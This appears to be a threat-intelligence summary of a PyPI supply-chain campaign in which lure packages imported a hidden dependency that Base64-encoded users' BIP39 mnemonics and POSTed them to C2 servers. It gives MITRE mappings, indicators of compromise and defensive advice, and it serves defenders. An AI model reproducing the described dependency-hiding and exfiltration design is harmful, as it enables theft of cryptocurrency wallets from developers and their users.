Keypoints
- Seven malicious PyPI packages (19 versions) were identified that collectively targeted BIP39 mnemonic recovery phrases by hiding malicious code in dependencies.
- Primary lure packages (e.g., mnemonic_to_address, public-address-generator) implemented legitimate BIP39/crypto functionality while importing a malicious dependency that exfiltrated secrets.
- The malicious module (bip39_mnemonic_decrypt / erc20-scanner / hashdecrypts) contained a decrypt_jsBIP39 function that Base64-encoded mnemonics and POSTed them to a remote C2 in a “license” field.
- Some packages fetched the real C2 address from a Base64-encoded URL stored on a GitHub raw file (HashSnake/backendapi/settings), enabling remote reconfiguration of the server address.
- Attackers used throwaway PyPI accounts and naming that mimicked legitimate crypto libraries to evade cursory audits and rely on victims not vetting dependencies deeply.
- Most packages were removed quickly after detection, but one earlier package (hashdecrypt) dated to Dec 2022 and had thousands of downloads, increasing potential impact.
MITRE Techniques
- [T1195.002] Compromise Software Dependencies and Development Tools – Malicious code was delivered via a dependent package rather than the primary lure package, forcing targets to trust dependencies (‘the second package, bip39_mnemonic_decrypt, serving as a “clean” package with the malicious bip39_mnemonic_decrypt listed as a dependency’).
- [T1195] Supply Chain Compromise – The campaign abused PyPI package distribution to insert malicious functionality into developer workflows (‘distributed through seven newly discovered malicious PyPI packages’).
- [T1027] Obfuscated Files or Information – Base64 encoding was used to hide the C2 URL and to encode mnemonics before transmission (‘First, it decodes the Base64 encoded URL of the data exfiltration server.’).
- [T1036] Masquerading – Package and function names were crafted to mimic legitimate cryptographic libraries and functions to avoid suspicion (‘the name of the imported module and invoked function are carefully chosen to mimic legitimate functions and not raise suspicion’).
- [T1071.001] Application Layer Protocol: Web Protocols – An HTTP POST was used to send encoded mnemonic data to the C2 server (‘sends it to the exfiltration server using a HTTP POST request’).
- [T1041] Exfiltration Over C2 Channel – Sensitive mnemonic phrases were exfiltrated over the network to a remote command-and-control server (‘encodes the provided mnemonic passphrase using Base64 and then sends it to the exfiltration server using a HTTP POST request’).
Indicators of Compromise
- [PyPI package names] Malicious packages used as lures and dependencies – bip39-mnemonic-decrypt, mnemonic_to_address (also public-address-generator, erc20-scanner, hashdecrypt, hashdecrypts).
- [File hashes] Signed package file SHA1s for identification – e.g., 45130c7a2d92282ee9c0b066206f235198b5ddfb (bip39-mnemonic-decrypt 1.0.0), 01b66f12e9f76342729c1260ff4f0da8fc1bbe01 (hashdecrypt 1.0.0), and 40+ other hashes listed in the report.
- [IP addresses] Known C2 hosts – 5.42.92.191, 194.163.154.242 (used as command-and-control infrastructure).
- [Domains / URLs] C2 and configuration endpoints – knallos.de, hxxps://raw.githubusercontent.com/HashSnake/backendapi/main/settings (used to retrieve the real C2 address), and hxxps://github.com/HashSnake/hCrypto (malicious GitHub repo).
Rewritten technical summary:
The campaign used a two-stage package design: a benign-looking primary package (e.g., mnemonic_to_address or public-address-generator) implementing advertised BIP39/crypto functions, and a malicious dependent package (bip39_mnemonic_decrypt, erc20-scanner, hashdecrypt(s)) that contained hidden exfiltration logic. The primary package calls a function (decrypt_jsBIP39) that is not part of legitimate libraries but is imported from the malicious dependency, passing the user-supplied mnemonic to it.
Within the malicious dependency the decrypt_jsBIP39 function is concealed at the end of __init__.py and first decodes a Base64-encoded URL to locate the exfiltration endpoint. It Base64-encodes the received mnemonic, inserts it into a data field labeled “license”, and issues an HTTP POST to a C2 server (web protocol) so the payload blends with expected application-layer traffic. Some variants first perform an HTTP GET to a Base64-encoded GitHub raw URL (HashSnake/backendapi/settings) to retrieve the current C2 address, enabling remote reconfiguration of the server without republishing packages.
The attackers used throwaway PyPI accounts and carefully chosen package/function names to resemble legitimate crypto tooling, relying on incomplete dependency audits to evade detection. Defenders should flag packages that import network libraries for cryptographic utilities, inspect dependencies for unexpected network calls or Base64-decoded URLs, block known C2 hosts (IPs/domains listed above), and verify package hashes against published IOC lists.